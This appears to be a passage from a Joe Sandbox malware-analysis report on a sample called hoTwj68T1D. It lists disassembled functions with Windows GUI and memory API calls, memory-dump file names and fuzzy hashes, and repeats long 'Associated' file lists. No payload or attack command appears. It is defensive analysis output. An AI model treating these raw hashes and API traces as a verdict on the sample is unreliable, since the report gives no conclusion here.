Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitMessageProcess
String ID: ($$>$$Error$Runtime error at 00000000
API String ID: 1220098344-1818022757
Opcode ID: be49712c4e14279b6c4ca7b81d980ddfc8d7d94698d23913b7080dbc99cbc426
Instruction ID: 3ea7ad3567819261177448626ead31d6915ae4ddf96f8611ea251b047f3ea632
Opcode Fuzzy Hash: be49712c4e14279b6c4ca7b81d980ddfc8d7d94698d23913b7080dbc99cbc426
Instruction Fuzzy Hash: 1121B6A46082505BEB21AB75B8827153F9197DB308F0481BBE740BF3E3C67C9D45876E

Function 0041D9C0 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041D8C0: GetObjectA.GDI32(?,00000018), ref: 0041D8CD

GetFocus.USER32 ref: 0041D9E0
73E9A570.USER32(?), ref: 0041D9EC
73E98830.GDI32(?,?,00000000,00000000,0041DA6B,?,?), ref: 0041DA0D
73E922A0.GDI32(?,?,?,00000000,00000000,0041DA6B,?,?), ref: 0041DA19
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041DA30
73E98830.GDI32(?,00000000,00000000,0041DA72,?,?), ref: 0041DA58
73E9A480.USER32(?,?,0041DA72,?,?), ref: 0041DA65

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: E98830$A480A570BitsE922FocusObject
String ID:
API String ID: 2688936647-0
Opcode ID: dbbc430b6c09b37b3db0efed513e582be710d95b53304319bfc3fa8f161f664b
Instruction ID: e3ee035fae82091ad8a1019b993e46a99715c786e7fd9d88786f3eac4fb70ece
Opcode Fuzzy Hash: dbbc430b6c09b37b3db0efed513e582be710d95b53304319bfc3fa8f161f664b
Instruction Fuzzy Hash: 631129B1E04608ABDB10DAE98C81FAFB7FCEF49740F14486AB514E7281D6789D408B68

Function 00419F84 Relevance: 10.6, APIs: 7, Instructions: 67COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000E), ref: 00419FA0
GetSystemMetrics.USER32(0000000D), ref: 00419FA8
74F10C70.COMCTL32(00000000,0000000D,00000000,00000001,00000001,00000001,?), ref: 00419FAE

Part of subcall function 0040FC48: 74F11210.COMCTL32(?,000000FF,00000000,00419FDC,00000000,0041A038,?,00000000,0000000D,00000000,00000001,00000001,00000001,?), ref: 0040FC4C

74F108F0.COMCTL32(?,00000000,00000000,00000000,00000000,0041A038,?,00000000,0000000D,00000000,00000001,00000001,00000001,?), ref: 00419FFE
74F10960.COMCTL32(00000000,?,?,00000000,00000000,00000000,00000000,0041A038,?,00000000,0000000D,00000000,00000001,00000001,00000001,?), ref: 0041A009
74F108F0.COMCTL32(?,00000001,?,?,00000000,?,?,00000000,00000000,00000000,00000000,0041A038,?,00000000,0000000D,00000000), ref: 0041A01C
74F11090.COMCTL32(?,0041A03F,?,00000000,?,?,00000000,00000000,00000000,00000000,0041A038,?,00000000,0000000D,00000000,00000001), ref: 0041A032

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: F108MetricsSystem$F10960F11090F11210
String ID:
API String ID: 1237432497-0
Opcode ID: 9d972e1f55844b525bd8bac7ea9a01a44ce1da7a3ebd69f3ecee10c6dfbe8d28
Instruction ID: 8884b7233a012d1b56143d995efc14ffa1f42b68cd88cc0df437bbe9186547ae
Opcode Fuzzy Hash: 9d972e1f55844b525bd8bac7ea9a01a44ce1da7a3ebd69f3ecee10c6dfbe8d28
Instruction Fuzzy Hash: 4911B971B44604BBEB10EBA5DC83F5E73B8EB49708F500076BA04FB6C1E5799E548714

Function 00425C90 Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00425CAB
WindowFromPoint.USER32(?,?), ref: 00425CB8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00425CC6
GetCurrentThreadId.KERNEL32 ref: 00425CCD
SendMessageA.USER32(00000000,00000084,?,?), ref: 00425CE6
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00425CFD
SetCursor.USER32(00000000), ref: 00425D0F

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 20f11d451485be78a4769b5298f1fd6e903a20d7c5f262d08bb0bb79106cc465
Instruction ID: da59b01c917859e74155e8e8f8b390680c38bea5980094ae9b3568d94200a5a7
Opcode Fuzzy Hash: 20f11d451485be78a4769b5298f1fd6e903a20d7c5f262d08bb0bb79106cc465
Instruction Fuzzy Hash: 4001FC52314B143AD6107675AC86E7F32A8CBC4B68F60853FB508AF292D93D9C00A73D

Function 004019AC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(\$,00000000,00401A62), ref: 004019C2
RtlEnterCriticalSection.KERNEL32(\$,\$,00000000,00401A62), ref: 004019D5
LocalAlloc.KERNEL32(00000000,00000FF8,\$,00000000,00401A62), ref: 004019FF
RtlLeaveCriticalSection.KERNEL32(\$,00401A69,00000000,00401A62), ref: 00401A5C

Strings

V%, xrefs: 00401A2B
\$, xrefs: 004019BD, 004019D0, 00401A57

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID: V%$\$
API String ID: 730355536-2608031954
Opcode ID: f8335acd01786e272d058e5020071424b75fa8aec8e5fe4b3593cf1d0e3042ba
Instruction ID: 6fbe601adee48df5e771a95d505fd6f7425a0eb8e0eed36de61d7b4cd49d3146
Opcode Fuzzy Hash: f8335acd01786e272d058e5020071424b75fa8aec8e5fe4b3593cf1d0e3042ba
Instruction Fuzzy Hash: AB0180747482405EF316AB7998167253F90F79E708F11807FE604ABAF2D67C4840CB2D

Function 0041CECC Relevance: 9.1, APIs: 6, Instructions: 144windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041CFA5
73E9A570.USER32(00000028,?,?,?,00000000,?), ref: 0041CFB1
73E98830.GDI32(00000000,?,00000000,00000000,0041D07C,?,00000028,?,?,?,00000000,?), ref: 0041CFE6
73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041D07C,?,00000028,?,?,?,00000000,?), ref: 0041CFF2
73EA6310.GDI32(00000000,?,00000004,0041D3D8,?,00000000,00000000,0041D05A,?,00000000,0041D07C,?,00000028), ref: 0041D020
73E98830.GDI32(00000000,00000000,00000000,0041D061,0041D3D8,?,00000000,00000000,0041D05A,?,00000000,0041D07C,?,00000028), ref: 0041D054

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: E98830$A570A6310E922Focus
String ID:
API String ID: 184897721-0
Opcode ID: eed2ad87a363f96440a9c974ef629800145cf2e90149fc5ee3761e346a7f7063
Instruction ID: 08dc9296c9e7bbde6a4a7ad9ff68603a6d45e5acb208b24bbd96c09f71a1f7aa
Opcode Fuzzy Hash: eed2ad87a363f96440a9c974ef629800145cf2e90149fc5ee3761e346a7f7063
Instruction Fuzzy Hash: 2A51FC71A00608AFCB11DFA9C891AEEBBB5FF4D704F10406AF500E7391D7799981CBA9

Function 0041D19C Relevance: 9.1, APIs: 6, Instructions: 142windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041D277
73E9A570.USER32(0000000C,?,?,?,00000000,?), ref: 0041D283
73E98830.GDI32(00000000,?,00000000,00000000,0041D349,?,0000000C,?,?,?,00000000,?), ref: 0041D2BD
73E922A0.GDI32(00000000,00000000,?,00000000,00000000,0041D349,?,0000000C,?,?,?,00000000,?), ref: 0041D2C9
73EA6310.GDI32(00000000,?,00000004,0041D3F4,?,00000000,00000000,0041D327,?,00000000,0041D349,?,0000000C), ref: 0041D2ED
73E98830.GDI32(00000000,00000000,00000000,0041D32E,0041D3F4,?,00000000,00000000,0041D327,?,00000000,0041D349,?,0000000C), ref: 0041D321

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: E98830$A570A6310E922Focus
String ID:
API String ID: 184897721-0
Opcode ID: 364ba82ede5ae00d81670b1219a16d8061151106d843f14521888275d2a753d9
Instruction ID: 50d0298bc7a21258ba2e2722f1fea07c52678f3748c3647933cd80243d7da0a6
Opcode Fuzzy Hash: 364ba82ede5ae00d81670b1219a16d8061151106d843f14521888275d2a753d9
Instruction Fuzzy Hash: 435107B5E006189FCB11DFA9C891AAEBBF9EF49700F11406AF904EB750D7389D80CB65

Function 0041CD68 Relevance: 9.1, APIs: 6, Instructions: 113windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 0041CDDE
73E9A570.USER32(?,00000000,0041CEB8,?,?,?,?), ref: 0041CDEA
73EA4620.GDI32(0041CF60,00000068,00000000,0041CE8C,?,?,00000000,0041CEB8,?,?,?,?), ref: 0041CE06
73ECE680.GDI32(0041CF60,00000000,00000008,?,0041CF60,00000068,00000000,0041CE8C,?,?,00000000,0041CEB8,?,?,?,?), ref: 0041CE23
73ECE680.GDI32(0041CF60,00000000,00000008,?,0041CF60,00000000,00000008,?,0041CF60,00000068,00000000,0041CE8C,?,?,00000000,0041CEB8), ref: 0041CE3A
73E9A480.USER32(?,0041CF60,0041CE93,?,?), ref: 0041CE86

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: E680$A4620A480A570Focus
String ID:
API String ID: 2226671993-0
Opcode ID: a3f8b1368eddb9e13cb115e197ffbc96236ac6032445159d28dfbd441cec196e
Instruction ID: c1639a5ba7e75701b3d2b0ea5b7774ef62b1c38ce58bbea604275bd7604e0777
Opcode Fuzzy Hash: a3f8b1368eddb9e13cb115e197ffbc96236ac6032445159d28dfbd441cec196e
Instruction Fuzzy Hash: 3141A331A406149FCB10DFA9CC86BAFBBB4EF49704F1484BAE900EB351D6389D50CBA5

Function 0041D5EC Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041D635
GetSystemMetrics.USER32(0000000C), ref: 0041D63F
73E9A570.USER32(00000000,0000000C,0000000B), ref: 0041D649
73EA4620.GDI32(00000000,0000000E,00000000,0041D6BC,?,00000000,0000000C,0000000B), ref: 0041D670
73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041D6BC,?,00000000,0000000C,0000000B), ref: 0041D67D
73E9A480.USER32(00000000,00000000,0041D6C3,0000000E,00000000,0041D6BC,?,00000000,0000000C,0000000B), ref: 0041D6B6

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: A4620MetricsSystem$A480A570
String ID:
API String ID: 4120540252-0
Opcode ID: 3e2a43667145fd73cbb8184491fd2efb44ea2c09a079038794fef953799869e2
Instruction ID: 1a131273bcad230a117d0c011a3157ddf7d509d609364d6b843051c7dfab6856
Opcode Fuzzy Hash: 3e2a43667145fd73cbb8184491fd2efb44ea2c09a079038794fef953799869e2
Instruction Fuzzy Hash: 76213EB4E44648AFEB00EFA9C941BEEB7B4EF48714F10452AE414BB281D6795D40CF69

Function 0041D5EA Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 0041D635
GetSystemMetrics.USER32(0000000C), ref: 0041D63F
73E9A570.USER32(00000000,0000000C,0000000B), ref: 0041D649
73EA4620.GDI32(00000000,0000000E,00000000,0041D6BC,?,00000000,0000000C,0000000B), ref: 0041D670
73EA4620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041D6BC,?,00000000,0000000C,0000000B), ref: 0041D67D
73E9A480.USER32(00000000,00000000,0041D6C3,0000000E,00000000,0041D6BC,?,00000000,0000000C,0000000B), ref: 0041D6B6

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: A4620MetricsSystem$A480A570
String ID:
API String ID: 4120540252-0
Opcode ID: 6e28f728964888884b43c830900d15e85c63fb046ea0cdd1b1aa4925e3a1b78f
Instruction ID: 28d6655f935cfcc48b8b00a21f4db36fb05792764d7142379e4f6f79a4d477f2
